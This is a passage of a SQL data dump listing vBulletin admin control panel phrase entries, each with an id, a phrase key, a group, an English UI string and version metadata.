(32982, -1, 'repeat_process', 'cpglobal', 'Repeat Process', 'vbulletin', '', 0, ''),
(32983, -1, 'replace_with_text', 'cpglobal', 'Replace with Text', 'vbulletin', '', 0, ''),
(32984, -1, 'reputation_level', 'cpglobal', 'Reputation Level', 'vbulletin', '', 0, ''),
(32985, -1, 'restart', 'cpglobal', 'Restart', 'vbulletin', '', 0, ''),
(32986, -1, 'results', 'cpglobal', 'Results', 'vbulletin', '', 0, ''),
(32987, -1, 'revert', 'cpglobal', 'Revert', 'vbulletin', '', 0, ''),
(32988, -1, 'rss_feed_manager', 'cpglobal', 'RSS Feed Manager', 'vbulletin', 'vBulletin Solutions', 1149264761, '3.6.0 Beta 1'),
(32989, -1, 'save_display_order', 'cpglobal', 'Save Display Order', 'vbulletin', '', 0, ''),
(32990, -1, 'save_enabled_status', 'cpglobal', 'Save Enabled Status', 'vbulletin', 'vBulletin Solutions', 1149075896, '3.6.0 Beta 1'),
(32991, -1, 'save_open_groups_automatically', 'cpglobal', 'Save open groups automatically', 'vbulletin', '', 0, ''),
(32992, -1, 'save_prefs', 'cpglobal', 'Save Prefs', 'vbulletin', '', 0, ''),
(32993, -1, 'scheduled_task_log', 'cpglobal', 'Scheduled Task Log', 'vbulletin', '', 0, ''),
(32994, -1, 'script', 'cpglobal', 'Script', 'vbulletin', '', 0, ''),
(32995, -1, 'search_for_text', 'cpglobal', 'Search for Text', 'vbulletin', '', 0, ''),
(32996, -1, 'search_in_x', 'cpglobal', 'Search in {1}', 'vbulletin', '', 0, ''),
(32997, -1, 'search_type', 'cpglobal', 'Search Type', 'vbulletin', '', 0, ''),
(32998, -1, 'select_forum', 'cpglobal', 'Select Forum', 'vbulletin', '', 0, ''),
(32999, -1, 'separate_usernames_semicolon', 'cpglobal', 'Separate multiple usernames with a \';\'', 'vbulletin', 'vBulletin Solutions', 1194362908, '3.7.0 Beta 1'),
(33000, -1, 'set_default', 'cpglobal', 'Set Default', 'vbulletin', '', 0, ''),
(33001, -1, 'setting_group', 'cpglobal', 'Setting Group', 'vbulletin', '', 0, ''),
(33002, -1, 'settings_to_edit', 'cpglobal', 'Settings to Edit Select the settings type you want to edit and click the \"Edit Settings\" button. ', 'vbulletin', '', 0, ''),
(33003, -1, 'social_bookmarking_manager', 'cpglobal', 'Social Bookmarking Manager', 'vbulletin', 'vBulletin Solutions', 1190988714, '3.7.0 Beta 1'),
(33004, -1, 'standard_using_default_usergroup_permissions', 'cpglobal', 'Standard: Using default usergroup permissions', 'vbulletin', '', 0, ''),
(33005, -1, 'statistics', 'cpglobal', 'Statistics', 'vbulletin', '', 0, ''),
(33006, -1, 'status', 'cpglobal', 'Status', 'vbulletin', '', 0, ''),
(33007, -1, 'style', 'cpglobal', 'Style', 'vbulletin', '', 0, ''),
(33008, -1, 'styles', 'cpglobal', 'Styles', 'vbulletin', '', 0, ''),
(33009, -1, 'stylevar', 'cpglobal', 'Stylevar', 'vbulletin', '', 0, ''),
(33010, -1, 'stylevars', 'cpglobal', 'StyleVars', 'vbulletin', '', 0, ''),
(33011, -1, 'table', 'cpglobal', 'Table', 'vbulletin', '', 0, ''),
(33012, -1, 'templates', 'cpglobal', 'Templates', 'vbulletin', '', 0, ''),
(33013, -1, 'text', 'cpglobal', 'Text', 'vbulletin', '', 0, ''),
(33014, -1, 'thumbnail', 'cpglobal', 'Thumbnail', 'vbulletin', '', 0, ''),
(33015, -1, 'to_continue_this_action', 'cpglobal', 'To continue this action, login using the admin account that initiated the action.', 'vbulletin', 'vBulletin Solutions', 1157730820, '3.6.1'),
(33016, -1, 'toggle_active_status_for_all', 'cpglobal', 'Toggle Active Status for All', 'vbulletin', 'vBulletin Solutions', 1190886666, '3.7.0 Beta 1'),
(33017, -1, 'translations', 'cpglobal', 'Translations', 'vbulletin', '', 0, ''),
(33018, -1, 'unknown_error', 'cpglobal', 'Unknown Error', 'vbulletin', '', 0, ''),
(33019, -1, 'update', 'cpglobal', 'Update', 'vbulletin', '', 0, ''),
(33020, -1, 'updated_x_styles', 'cpglobal', 'Updated {1} style(s)', 'vbulletin', '', 0, ''),
(33021, -1, 'upload_xml_file', 'cpglobal', 'EITHER upload the XML file from your computer', 'vbulletin', '', 0, ''),
(33022, -1, 'user_profile_field', 'cpglobal', 'User Profile Field', 'vbulletin', '', 0, ''),
(33023, -1, 'user_profile_fields', 'cpglobal', 'User Profile Fields', 'vbulletin', '', 0, ''),
(33024, -1, 'user_rank', 'cpglobal', 'User Rank', 'vbulletin', '', 0, ''),
(33025, -1, 'usergroup_options', 'cpglobal', 'Usergroup Options', 'vbulletin', '', 0, ''),
(33026, -1, 'users', 'cpglobal', 'Users', 'vbulletin', '', 0, ''),
(33027, -1, 'utf8encode_title', 'cpglobal', 'UTF8 Encode {TITLE}', 'vbulletin', 'vBulletin Solutions', 1266999728, '3.8.5'),
(33028, -1, 'utf8encode_title_help', 'cpglobal', 'Some sites (such as twitter.com) require URL to be encoded. Set \"Yes\" if this is required.', 'vbulletin', 'vBulletin Solutions', 1266813988, '3.8.5'),
(33029, -1, 'varname', 'cpglobal', 'Varname', 'vbulletin', '', 0, ''),
(33030, -1, 'vbulletin_default', 'cpglobal', 'vBulletin Default (Will be replaced by upgrade scripts) ', 'vbulletin', '', 0, ''),
(33031, -1, 'vbulletin_options', 'cpglobal', 'vBulletin Options', 'vbulletin', '', 0, ''),
(33032, -1, 'view_reputation_comments', 'cpglobal', 'View Reputation Comments', 'vbulletin', '', 0, ''),
(33033, -1, 'who_voted', 'cpglobal', 'Who Voted', 'vbulletin', '', 0, ''),
(33034, -1, 'x_enter_the_options_that_the_user_can_choose_from', 'cpglobal', '{1}Enter the options that the user can choose from. Separate each option with a new-line (carriage return). ', 'vbulletin', '', 0, ''),
(33035, -1, 'x_from_the_calendar_y', 'cpglobal', '{1} from the calendar {2} ', 'vbulletin', 'vBulletin Solutions', 1201000591, '3.7.0 Beta 5'),
(33036, -1, 'x_from_the_forum_y', 'cpglobal', '{1} from the forum {2} ', 'vbulletin', 'vBulletin Solutions', 1201000537, '3.7.0 Beta 5'),
(33037, -1, 'x_to_y', 'cpglobal', '{1} to {2}', 'vbulletin', '', 0, ''),
(33038, -1, 'x_translation', 'cpglobal', '{1} Translation', 'vbulletin', '', 0, ''),
(33039, -1, 'x_y_id_z', 'cpglobal', '{1}: {2} (id: {3}) ', 'vbulletin', '', 0, ''),
(33040, -1, 'you_did_not_specify_a_file_to_upload', 'cpglobal', 'You did not specify a file to upload, so vBulletin will attempt to import the file\\n\\n{1}\\n\\nfrom the server\'s file system.\\n\\nAre you sure?', 'vbulletin', '', 0, ''),
(33041, -1, 'zero_equals_no_display', 'cpglobal', 'Set to \'0\' to not display this item', 'vbulletin', '', 0, ''),
(33042, -1, 'add_new_automatic_ban', 'cphome', 'Add New Automatic Ban', 'vbulletin', 'vBulletin Solutions', 1157730753, '3.6.1'),
(33043, -1, 'add_new_avatars', 'cphome', 'Add New Avatars', 'vbulletin', '', 0, ''),
(33044, -1, 'add_new_bb_code', 'cphome', 'Add New BB Code', 'vbulletin', '', 0, ''),
(33045, -1, 'add_new_calendar', 'cphome', 'Add New Calendar', 'vbulletin', '', 0, ''),
(33046, -1, 'add_new_faq_item', 'cphome', 'Add New FAQ Item', 'vbulletin', '', 0, ''),
(33047, -1, 'add_new_forum', 'cphome', 'Add New Forum', 'vbulletin', '', 0, ''),
(33048, -1, 'add_new_plugin', 'cphome', 'Add New Plugin', 'vbulletin', '', 0, ''),
(33049, -1, 'add_new_post_icon', 'cphome', 'Add New Post Icon', 'vbulletin', '', 0, ''),
(33050, -1, 'add_new_prefix_set', 'cphome', 'Add New Prefix Set', 'vbulletin', 'vBulletin Solutions', 1190044326, '3.7.0 Beta 1'),
(33051, -1, 'add_new_scheduled_task', 'cphome', 'Add New Scheduled Task', 'vbulletin', '', 0, ''),
(33052, -1, 'add_new_smilie', 'cphome', 'Add New Smilie', 'vbulletin', '', 0, ''),
(33053, -1, 'add_new_social_group_category', 'cphome', 'Add New Social Group Category', 'vbulletin', 'vBulletin Solutions', 1215700714, '3.8.0 Alpha 1'),
(33054, -1, 'add_new_subscription', 'cphome', 'Add New Subscription', 'vbulletin', '', 0, ''),
(33055, -1, 'add_new_user', 'cphome', 'Add New User', 'vbulletin', '', 0, ''),
(33056, -1, 'add_new_user_infraction_group', 'cphome', 'Add New User Infraction Group', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33057, -1, 'add_new_user_infraction_level', 'cphome', 'Add New User Infraction Level', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33058, -1, 'add_new_user_profile_field', 'cphome', 'Add New User Profile Field', 'vbulletin', '', 0, ''),
(33059, -1, 'add_new_user_rank', 'cphome', 'Add New User Rank', 'vbulletin', '', 0, ''),
(33060, -1, 'add_new_user_reputation', 'cphome', 'Add New User Reputation', 'vbulletin', '', 0, ''),
(33061, -1, 'add_new_user_title', 'cphome', 'Add New User Title', 'vbulletin', '', 0, ''),
(33062, -1, 'add_new_usergroup', 'cphome', 'Add New Usergroup', 'vbulletin', '', 0, ''),
(33063, -1, 'add_paymentapi', 'cphome', 'Add New Payment API', 'vbulletin', '', 0, ''),
(33064, -1, 'address', 'cphome', 'Address', 'vbulletin', 'vBulletin Solutions', 1150120073, '3.6.0 Beta 2'),
(33065, -1, 'admin_attention_required', 'cphome', 'Administrator Attention Required', 'vbulletin', 'vBulletin Solutions', 1150120087, '3.6.0 Beta 2'),
(33066, -1, 'admin_help_manager', 'cphome', 'Admin Help Manager', 'vbulletin', '', 0, ''),
(33067, -1, 'administrator_notes', 'cphome', 'Administrator Notes', 'vbulletin', '', 0, ''),
(33068, -1, 'advertising', 'cphome', 'Advertising', 'vbulletin', 'vBulletin Solutions', 1228479530, '3.8.0 Beta 4'),
(33069, -1, 'album_picture_storage_type', 'cphome', 'Album Picture Storage Type', 'vbulletin', 'vBulletin Solutions', 1192541633, '3.7.0 Beta 1'),
(33070, -1, 'apc_too_old', 'cphome', 'Your server is running a version of the Alternative PHP Cache (APC) that is incompatible with this version of vBulletin. Please upgrade APC to version 3.0.0 or newer.', 'vbulletin', 'vBulletin Solutions', 1201518151, '3.7.0 Beta 5'),
(33071, -1, 'attachment_manager', 'cphome', 'Attachment Manager', 'vbulletin', 'vBulletin Solutions', 1148056467, '3.6.0 Beta 1'),
(33072, -1, 'attachment_permissions', 'cphome', 'Attachment Permissions', 'vbulletin', 'vBulletin Solutions', 1148324940, '3.6.0 Beta 1'),
(33073, -1, 'attachment_storage_type', 'cphome', 'Attachment Storage Type', 'vbulletin', '', 0, ''),
(33074, -1, 'attachment_usage', 'cphome', 'Attachment Usage', 'vbulletin', '', 0, ''),
(33075, -1, 'attachments_awaiting_moderation', 'cphome', 'Attachments to Moderate', 'vbulletin', '', 0, ''),
(33076, -1, 'avatar_manager', 'cphome', 'Avatar Manager', 'vbulletin', '', 0, ''),
(33077, -1, 'ban_user', 'cphome', 'Ban User', 'vbulletin', '', 0, ''),
(33078, -1, 'bb_code_manager', 'cphome', 'BB Code Manager', 'vbulletin', '', 0, ''),
(33079, -1, 'business_development', 'cphome', 'Business Development', 'vbulletin', '', 0, ''),
(33080, -1, 'calendar_manager', 'cphome', 'Calendar Manager', 'vbulletin', '', 0, ''),
(33081, -1, 'calendar_permissions', 'cphome', 'Calendar Permissions', 'vbulletin', '', 0, ''),
(33082, -1, 'calendars', 'cphome', 'Calendars', 'vbulletin', 'vBulletin Solutions', 1161272137, '3.6.3'),
(33083, -1, 'collapse_all', 'cphome', 'Collapse All', 'vbulletin', '', 0, ''),
(33084, -1, 'collapse_group', 'cphome', 'Collapse Group', 'vbulletin', '', 0, ''),
(33085, -1, 'community_forums', 'cphome', 'Community Forums', 'vbulletin', '', 0, ''),
(33086, -1, 'control_panel_home', 'cphome', 'Control Panel Home', 'vbulletin', '', 0, ''),
(33087, -1, 'copyright_enforcement_by', 'cphome', 'Copyright Enforcement By', 'vbulletin', '', 0, ''),
(33088, -1, 'could_not_open_x', 'cphome', 'Fatal Error Could not open {1} ', 'vbulletin', '', 0, ''),
(33089, -1, 'currently_x_customized_templates_updated', 'cphome', 'There are currently {1} customized template(s) that need to be updated or reverted. Some sections of vBulletin may not function if you do not do this! \r\n \r\nClick here to view these templates! ', 'vbulletin', '', 0, ''),
(33090, -1, 'custom_avatar_usage', 'cphome', 'Avatar Usage', 'vbulletin', '', 0, ''),
(33091, -1, 'custom_bb_codes', 'cphome', 'Custom BB Codes', 'vbulletin', '', 0, ''),
(33092, -1, 'custom_profile_picture_usage', 'cphome', 'Profile Picture Usage', 'vbulletin', '', 0, ''),
(33093, -1, 'database_data_usage', 'cphome', 'Data Usage', 'vbulletin', '', 0, ''),
(33094, -1, 'database_index_usage', 'cphome', 'Index Usage', 'vbulletin', '', 0, ''),
(33095, -1, 'dismiss', 'cphome', 'Dismiss', 'vbulletin', 'vBulletin Solutions', 1150120141, '3.6.0 Beta 2'),
(33096, -1, 'download_latest_version', 'cphome', 'Download Latest Version', 'vbulletin', '', 0, ''),
(33097, -1, 'download_upload_languages', 'cphome', 'Download / Upload Languages', 'vbulletin', '', 0, ''),
(33098, -1, 'download_upload_plugins', 'cphome', 'Download / Upload Plugins', 'vbulletin', '', 0, ''),
(33099, -1, 'download_upload_styles', 'cphome', 'Download / Upload Styles', 'vbulletin', '', 0, ''),
(33100, -1, 'download_vbulletin_x_from_members_area', 'cphome', 'Click here to download vBulletin {1} from the Members\' Area', 'vbulletin', '', 0, ''),
(33101, -1, 'due_tasks', 'cphome', 'Due Tasks', 'vbulletin', '', 0, ''),
(33102, -1, 'duplicate_permissions', 'cphome', 'Duplicate Permissions', 'vbulletin', 'vBulletin Solutions', 1213891230, '3.8.0 Alpha 1'),
(33103, -1, 'eaccelerator_too_old', 'cphome', 'eAccelerator for PHP must be upgraded to 0.9.3 or newer.', 'vbulletin', '', 0, ''),
(33104, -1, 'events_awaiting_moderation', 'cphome', 'Events to Moderate', 'vbulletin', '', 0, ''),
(33105, -1, 'expand_group', 'cphome', 'Expand Group', 'vbulletin', '', 0, ''),
(33106, -1, 'faq_manager', 'cphome', 'FAQ Manager', 'vbulletin', '', 0, ''),
(33107, -1, 'file_uploads_disabled', 'cphome', 'FILE_UPLOADS Disabled', 'vbulletin', '', 0, ''),
(33108, -1, 'find_updated_phrases', 'cphome', 'Find Updated Phrases', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33109, -1, 'find_updated_templates', 'cphome', 'Find Updated Templates', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33110, -1, 'forum_home_page', 'cphome', 'Forum Home Page', 'vbulletin', '', 0, ''),
(33111, -1, 'forum_manager', 'cphome', 'Forum Manager', 'vbulletin', '', 0, ''),
(33112, -1, 'forum_permissions', 'cphome', 'Forum Permissions', 'vbulletin', '', 0, ''),
(33113, -1, 'forums_and_moderators', 'cphome', 'Forums & Moderators', 'vbulletin', '', 0, ''),
(33114, -1, 'google_adsense', 'cphome', 'Google AdSense', 'vbulletin', 'vBulletin Solutions', 1228479560, '3.8.0 Beta 4'),
(33115, -1, 'graphics_development', 'cphome', 'Graphics Development', 'vbulletin', '', 0, ''),
(33116, -1, 'holiday_manager', 'cphome', 'Holiday Manager', 'vbulletin', '', 0, ''),
(33117, -1, 'human_verification', 'cphome', 'Human Verification', 'vbulletin', 'vBulletin Solutions', 1192474912, '3.7.0 Beta 1'),
(33118, -1, 'human_verification_manager', 'cphome', 'Human Verification Manager', 'vbulletin', 'vBulletin Solutions', 1192474938, '3.7.0 Beta 1'),
(33119, -1, 'language_manager', 'cphome', 'Language Manager', 'vbulletin', '', 0, ''),
(33120, -1, 'languages', 'cphome', 'Languages', 'vbulletin', '', 0, ''),
(33121, -1, 'languages_and_phrases', 'cphome', 'Languages & Phrases', 'vbulletin', '', 0, ''),
(33122, -1, 'latest_version_available_x', 'cphome', 'Latest version available: {1}', 'vbulletin', '', 0, ''),
(33123, -1, 'log_manager', 'cphome', 'Log Manager', 'vbulletin', '', 0, ''),
(33124, -1, 'manage_products', 'cphome', 'Manage Products', 'vbulletin', '', 0, ''),
(33125, -1, 'members_area', 'cphome', 'Members\' Area', 'vbulletin', '', 0, ''),
(33126, -1, 'merge_users', 'cphome', 'Merge Users', 'vbulletin', '', 0, ''),
(33127, -1, 'messages_awaiting_moderation', 'cphome', 'Messages to Moderate', 'vbulletin', 'vBulletin Solutions', 1191956359, '3.7.0 Beta 1'),
(33128, -1, 'mmcache_not_supported', 'cphome', 'Turck MMCache has been made obsolete by eAccelerator and does not function properly with vBulletin.', 'vbulletin', '', 0, ''),
(33129, -1, 'moderate_attachments', 'cphome', 'Moderate Attachments', 'vbulletin', '', 0, ''),
(33130, -1, 'moderate_events', 'cphome', 'Moderate Events', 'vbulletin', '', 0, ''),
(33131, -1, 'moderate_posts', 'cphome', 'Moderate Posts', 'vbulletin', '', 0, ''),
(33132, -1, 'moderate_signatures', 'cphome', 'Moderate Signatures', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33133, -1, 'moderate_threads', 'cphome', 'Moderate Threads', 'vbulletin', '', 0, ''),
(33134, -1, 'moderate_users', 'cphome', 'Moderate Users', 'vbulletin', '', 0, ''),
(33135, -1, 'moderate_visitor_messages', 'cphome', 'Moderate Visitor Messages', 'vbulletin', 'vBulletin Solutions', 1208262824, '3.7.0 Release Candidate 4'),
(33136, -1, 'mysql_language_lookup', 'cphome', 'MySQL Language Lookup', 'vbulletin', '', 0, ''),
(33137, -1, 'mysql_max_packet_size', 'cphome', 'MySQL Packet Size', 'vbulletin', '', 0, ''),
(33138, -1, 'mysql_running_strict_mode', 'cphome', 'MySQL is running in strict mode. While you may proceed, some areas of vBulletin may not function properly. It is strongly recommended that you set $config[\'Database\'][\'force_sql_mode\']
to true
in your includes/config.php file!', 'vbulletin', '', 0, ''),
(33139, -1, 'mysql_strict_mode_warning', 'cphome', 'MySQL Strict Mode Warning', 'vbulletin', '', 0, ''),
(33140, -1, 'mysql_version', 'cphome', 'MySQL Version', 'vbulletin', '', 0, ''),
(33141, -1, 'new_posts_today', 'cphome', 'New Posts Today', 'vbulletin', '', 0, ''),
(33142, -1, 'new_threads_today', 'cphome', 'New Threads Today', 'vbulletin', '', 0, ''),
(33143, -1, 'new_users_today', 'cphome', 'New Users Today', 'vbulletin', '', 0, ''),
(33144, -1, 'news_header_string', 'cphome', 'For Your Information', 'vbulletin', 'vBulletin Solutions', 1157465077, '3.6.1'),
(33145, -1, 'no_frames_support', 'cphome', 'Your browser does not support frames. Please get one that does!', 'vbulletin', '', 0, ''),
(33146, -1, 'other_contributions_from', 'cphome', 'Other Contributions From', 'vbulletin', '', 0, ''),
(33147, -1, 'out_of_date_custom_templates_found', 'cphome', 'Out-of-Date Custom Templates Found!', 'vbulletin', '', 0, ''),
(33148, -1, 'paymentapi_manager', 'cphome', 'Payment API Manager', 'vbulletin', '', 0, ''),
(33149, -1, 'php_function_lookup', 'cphome', 'PHP Function Lookup', 'vbulletin', '', 0, ''),
(33150, -1, 'php_max_post_size', 'cphome', 'PHP Max Post Size', 'vbulletin', '', 0, ''),
(33151, -1, 'php_max_upload_size', 'cphome', 'PHP Maximum Upload Size', 'vbulletin', '', 0, ''),
(33152, -1, 'php_memory_limit', 'cphome', 'PHP Memory Limit', 'vbulletin', '', 0, ''),
(33153, -1, 'phrase_manager', 'cphome', 'Phrase Manager', 'vbulletin', '', 0, ''),
(33154, -1, 'please_note_deleting_this_item_will_remove_children', 'cphome', 'Please note : deleting this item will also remove any child entries of this item.', 'vbulletin', '', 0, ''),
(33155, -1, 'plugin_manager', 'cphome', 'Plugin Manager', 'vbulletin', '', 0, ''),
(33156, -1, 'plugins_products', 'cphome', 'Plugins & Products', 'vbulletin', 'vBulletin Solutions', 1161596425, '3.6.3'),
(33157, -1, 'post_icon_manager', 'cphome', 'Post Icon Manager', 'vbulletin', '', 0, ''),
(33158, -1, 'post_new_announcement', 'cphome', 'Post New Announcement', 'vbulletin', 'vBulletin Solutions', 1142642373, '3.6.0 Beta 1'),
(33159, -1, 'posts_awaiting_moderation', 'cphome', 'Posts to Moderate', 'vbulletin', '', 0, ''),
(33160, -1, 'private_message_statistics', 'cphome', 'Private Message Statistics', 'vbulletin', '', 0, ''),
(33161, -1, 'problematic_php_optimizer_found', 'cphome', 'Problematic PHP Optimizer Found', 'vbulletin', '', 0, ''),
(33162, -1, 'product_manager', 'cphome', 'Product Manager', 'vbulletin', '', 0, ''),
(33163, -1, 'prune_social_groups', 'cphome', 'Prune Social Groups', 'vbulletin', 'vBulletin Solutions', 1200321595, '3.7.0 Beta 4'),
(33164, -1, 'prune_users', 'cphome', 'Prune / Move Users', 'vbulletin', '', 0, ''),
(33165, -1, 'quick_administrator_links', 'cphome', 'Quick Administrator Links', 'vbulletin', '', 0, ''),
(33166, -1, 'quick_moderator_links', 'cphome', 'Quick Moderator Links', 'vbulletin', '', 0, ''),
(33167, -1, 'quick_phrase_finder', 'cphome', 'Quick Phrase Finder', 'vbulletin', 'vBulletin Solutions', 1199205986, '3.7.0 Beta 4'),
(33168, -1, 'quick_user_finder', 'cphome', 'Quick User Finder', 'vbulletin', '', 0, ''),
(33169, -1, 'rebuild_bitfields', 'cphome', 'Rebuild Bitfields', 'vbulletin', '', 0, ''),
(33170, -1, 'rebuild_thumbnails', 'cphome', 'Rebuild Thumbnails', 'vbulletin', 'vBulletin Solutions', 1192541661, '3.7.0 Beta 1'),
(33171, -1, 'reference_manual', 'cphome', 'Reference Manual', 'vbulletin', '', 0, ''),
(33172, -1, 'referrals', 'cphome', 'Referrals', 'vbulletin', '', 0, ''),
(33173, -1, 'repair_optimize_tables', 'cphome', 'Repair / Optimize Tables', 'vbulletin', '', 0, ''),
(33174, -1, 'replacement_variable_manager', 'cphome', 'Replacement Variable Manager', 'vbulletin', '', 0, ''),
(33175, -1, 'revert_prefs', 'cphome', 'Revert Prefs', 'vbulletin', '', 0, ''),
(33176, -1, 'rss_feeds', 'cphome', 'RSS Feeds', 'vbulletin', 'vBulletin Solutions', 1150844131, '3.6.0 Beta 3'),
(33177, -1, 'safe_mode', 'cphome', 'Safe Mode', 'vbulletin', '', 0, ''),
(33178, -1, 'scheduled_task_manager', 'cphome', 'Scheduled Task Manager', 'vbulletin', '', 0, ''),
(33179, -1, 'scheduled_tasks', 'cphome', 'Scheduled Tasks', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33180, -1, 'search_for_users', 'cphome', 'Search for Users', 'vbulletin', '', 0, ''),
(33181, -1, 'search_in_phrases', 'cphome', 'Search in Phrases', 'vbulletin', '', 0, ''),
(33182, -1, 'search_in_templates', 'cphome', 'Search in Templates', 'vbulletin', '', 0, ''),
(33183, -1, 'search_ip_addresses', 'cphome', 'Search IP Addresses', 'vbulletin', '', 0, ''),
(33184, -1, 'search_social_groups', 'cphome', 'Search Social Groups', 'vbulletin', 'vBulletin Solutions', 1215700563, '3.8.0 Alpha 1'),
(33185, -1, 'search_type', 'cphome', 'Search Type', 'vbulletin', '', 0, ''),
(33186, -1, 'send_email_to_users', 'cphome', 'Send Email to Users', 'vbulletin', '', 0, ''),
(33187, -1, 'server_load_averages', 'cphome', 'Server Load Averages', 'vbulletin', '', 0, ''),
(33188, -1, 'server_type', 'cphome', 'Server Type', 'vbulletin', '', 0, ''),
(33189, -1, 'show_all_moderators', 'cphome', 'Show All Moderators', 'vbulletin', '', 0, ''),
(33190, -1, 'show_all_news', 'cphome', 'Show All News', 'vbulletin', 'vBulletin Solutions', 1157465113, '3.6.1'),
(33191, -1, 'smilie_manager', 'cphome', 'Smilie Manager', 'vbulletin', '', 0, ''),
(33192, -1, 'social_group_categories', 'cphome', 'Social Group Categories', 'vbulletin', 'vBulletin Solutions', 1215700592, '3.8.0 Alpha 1'),
(33193, -1, 'social_group_icon', 'cphome', 'Social Group Icon', 'vbulletin', 'vBulletin Solutions', 1231772341, '3.8.1'),
(33194, -1, 'social_group_icon_storage_type', 'cphome', 'Social Group Icon Storage Type', 'vbulletin', 'vBulletin Solutions', 1216812667, '3.8.0 Alpha 1'),
(33195, -1, 'software_developed_by', 'cphome', 'Software Developed By', 'vbulletin', '', 0, ''),
(33196, -1, 'software_development', 'cphome', 'Software Development', 'vbulletin', '', 0, ''),
(33197, -1, 'statistics_and_logs', 'cphome', 'Statistics & Logs', 'vbulletin', '', 0, ''),
(33198, -1, 'strip_poll', 'cphome', 'Strip Poll', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33199, -1, 'style_manager', 'cphome', 'Style Manager', 'vbulletin', '', 0, ''),
(33200, -1, 'styles_and_templates', 'cphome', 'Styles & Templates', 'vbulletin', '', 0, ''),
(33201, -1, 'subscription_manager', 'cphome', 'Subscription Manager', 'vbulletin', '', 0, ''),
(33202, -1, 'subscription_permissions', 'cphome', 'Subscription Permissions', 'vbulletin', 'vBulletin Solutions', 1146675021, '3.6.0 Beta 1'),
(33203, -1, 'sure_you_want_to_log_out_of_cp', 'cphome', 'Are you sure you want to log out of the control panel?', 'vbulletin', '', 0, ''),
(33204, -1, 'test_communication', 'cphome', 'Test Communication', 'vbulletin', '', 0, ''),
(33205, -1, 'there_is_a_newer_vbulletin_version', 'cphome', 'There is a newer version of vBulletin available to download', 'vbulletin', '', 0, ''),
(33206, -1, 'thread_prefix_manager', 'cphome', 'Thread Prefix Manager', 'vbulletin', 'vBulletin Solutions', 1190044316, '3.7.0 Beta 1'),
(33207, -1, 'thread_prefixes', 'cphome', 'Thread Prefixes', 'vbulletin', 'vBulletin Solutions', 1190043795, '3.7.0 Beta 1'),
(33208, -1, 'threads_and_posts', 'cphome', 'Threads & Posts', 'vbulletin', '', 0, ''),
(33209, -1, 'threads_awaiting_moderation', 'cphome', 'Threads to Moderate', 'vbulletin', '', 0, ''),
(33210, -1, 'transaction_log', 'cphome', 'Transaction Log', 'vbulletin', 'vBulletin Solutions', 1147110526, '3.6.0 Beta 1'),
(33211, -1, 'transaction_log_and_stats', 'cphome', 'Transaction Log & Stats', 'vbulletin', 'vBulletin Solutions', 1147108253, '3.6.0 Beta 1'),
(33212, -1, 'transaction_stats', 'cphome', 'Transaction Stats', 'vbulletin', 'vBulletin Solutions', 1147110532, '3.6.0 Beta 1'),
(33213, -1, 'unique_registered_visitors_today', 'cphome', 'Unique Members Today', 'vbulletin', '', 0, ''),
(33214, -1, 'update_counters', 'cphome', 'Update Counters', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33215, -1, 'upload_avatar', 'cphome', 'Upload Avatar', 'vbulletin', '', 0, ''),
(33216, -1, 'upload_post_icon', 'cphome', 'Upload Post Icon', 'vbulletin', '', 0, ''),
(33217, -1, 'upload_smilie', 'cphome', 'Upload Smilie', 'vbulletin', '', 0, ''),
(33218, -1, 'useful_links', 'cphome', 'Useful Links', 'vbulletin', '', 0, ''),
(33219, -1, 'user_albums', 'cphome', 'User Albums', 'vbulletin', 'vBulletin Solutions', 1192541615, '3.7.0 Beta 1'),
(33220, -1, 'user_infraction_level_manager', 'cphome', 'User Infraction Level Manager', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33221, -1, 'user_infraction_manager', 'cphome', 'User Infraction Manager', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33222, -1, 'user_infractions', 'cphome', 'User Infractions', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33223, -1, 'user_profile_field_categories', 'cphome', 'User Profile Field Categories', 'vbulletin', 'vBulletin Solutions', 1176908634, '3.6.6'),
(33224, -1, 'user_profile_field_manager', 'cphome', 'User Profile Field Manager', 'vbulletin', '', 0, ''),
(33225, -1, 'user_rank_manager', 'cphome', 'User Rank Manager', 'vbulletin', '', 0, ''),
(33226, -1, 'user_ranks', 'cphome', 'User Ranks', 'vbulletin', '', 0, ''),
(33227, -1, 'user_reputation_manager', 'cphome', 'User Reputation Manager', 'vbulletin', '', 0, ''),
(33228, -1, 'user_reputations', 'cphome', 'User Reputations', 'vbulletin', '', 0, ''),
(33229, -1, 'user_title_manager', 'cphome', 'User Title Manager', 'vbulletin', '', 0, ''),
(33230, -1, 'user_titles', 'cphome', 'User Titles', 'vbulletin', '', 0, ''),
(33231, -1, 'usergroup_manager', 'cphome', 'Usergroup Manager', 'vbulletin', '', 0, ''),
(33232, -1, 'userpic_storage_type', 'cphome', 'User Picture Storage Type', 'vbulletin', '', 0, ''),
(33233, -1, 'users_awaiting_moderation', 'cphome', 'Users to Moderate', 'vbulletin', '', 0, ''),
(33234, -1, 'users_online', 'cphome', 'Users Online', 'vbulletin', '', 0, ''),
(33235, -1, 'users_online_x_members_y_guests', 'cphome', '{1} Users Online ({2} members and {3} guests)', 'vbulletin', '', 0, ''),
(33236, -1, 'vbulletin_developers_and_contributors', 'cphome', 'vBulletin Developers & Contributors', 'vbulletin', '', 0, ''),
(33237, -1, 'vbulletin_news_x', 'cphome', 'vBulletin News: {1}', 'vbulletin', 'vBulletin Solutions', 1157465022, '3.6.1'),
(33238, -1, 'view_banned_users', 'cphome', 'View Banned Users', 'vbulletin', '', 0, ''),
(33239, -1, 'view_infractions', 'cphome', 'View Infractions', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33240, -1, 'view_permissions', 'cphome', 'View Permissions', 'vbulletin', '', 0, ''),
(33241, -1, 'view_php_info', 'cphome', 'View PHP Info', 'vbulletin', 'vBulletin Solutions', 1217724234, '3.8.0 Alpha 1'),
